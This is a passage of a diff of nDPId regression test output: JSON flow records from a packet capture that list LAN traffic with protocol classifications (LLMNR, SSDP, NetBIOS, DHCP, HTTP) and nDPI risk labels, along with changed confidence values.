{"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104408049,"flow_last_seen":1470104408457,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104405794,"flow_last_seen":1470104405794,"flow_idle_time":200000,"flow_min_l4_payload_len":121,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.119.2","dst_ip":"255.255.255.255","src_port":43786,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104405794,"flow_last_seen":1470104405794,"flow_idle_time":200000,"flow_min_l4_payload_len":121,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.119.2","dst_ip":"255.255.255.255","src_port":43786,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104401187,"flow_last_seen":1470104401187,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":50030,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104383810,"flow_last_seen":1470104413817,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.119.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104382448,"flow_last_seen":1470104427503,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":51704,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104373232,"flow_last_seen":1470104430168,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1862,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104429964,"flow_last_seen":1470104430065,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00925{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1470104380890,"flow_last_seen":1470104382084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":9883,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104420438,"flow_last_seen":1470104420540,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1470104397807,"flow_last_seen":1470104414604,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":959,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104424738,"flow_last_seen":1470104426276,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104393610,"flow_last_seen":1470104394635,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104391564,"flow_last_seen":1470104422179,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":650,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1470104378021,"flow_last_seen":1470104379520,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104393610,"flow_last_seen":1470104393611,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":200000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":465,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381217,"flow_last_seen":1470104381626,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00924{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104380188,"flow_last_seen":1470104380928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382038,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382036,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104401187,"flow_last_seen":1470104401187,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":50030,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104383810,"flow_last_seen":1470104413817,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.119.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104382448,"flow_last_seen":1470104427503,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":51704,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104373232,"flow_last_seen":1470104430168,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1862,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104429964,"flow_last_seen":1470104430065,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00925{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1470104380890,"flow_last_seen":1470104382084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":9883,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104420438,"flow_last_seen":1470104420540,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1470104397807,"flow_last_seen":1470104414604,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":959,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104424738,"flow_last_seen":1470104426276,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104393610,"flow_last_seen":1470104394635,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104391564,"flow_last_seen":1470104422179,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":650,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1470104378021,"flow_last_seen":1470104379520,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104393610,"flow_last_seen":1470104393611,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 